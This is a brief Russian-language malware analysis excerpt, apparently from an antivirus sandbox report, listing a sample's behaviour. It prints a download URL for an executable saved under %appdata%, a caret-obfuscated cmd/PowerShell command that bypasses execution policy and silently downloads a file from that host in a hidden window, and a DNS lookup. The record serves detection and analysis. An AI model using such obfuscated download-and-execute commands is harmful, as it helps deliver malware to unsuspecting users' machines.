Техническая информация
- http://wodkwkkwiiej81.com/ttt/2002.exe как %appdata%.exe
- '<SYSTEM32>\cmd.exe' /c "po^wER^ShELL.E^x^E ^-EX^e^C^uT^IO^npoL^ICY^ b^YpA^S^S^ -NopRoFILe^ -^winD^o^w^St^y^L^E hiDde^n ^(N^ew-o^bJecT SystEM^.^NEt.^w^eB^CL^IE^NT^).Dow^nloA^dFilE('http://wodkwkkwiiej81...
- DNS ASK wo####kwiiej81.com
- '<SYSTEM32>\cmd.exe' /c "po^wER^ShELL.E^x^E ^-EX^e^C^uT^IO^npoL^ICY^ b^YpA^S^S^ -NopRoFILe^ -^winD^o^w^St^y^L^E hiDde^n ^(N^ew-o^bJecT SystEM^.^NEt.^w^eB^CL^IE^NT^).Dow^nloA^dFilE('http://wodkwkkwiiej81...' (со скрытым окном)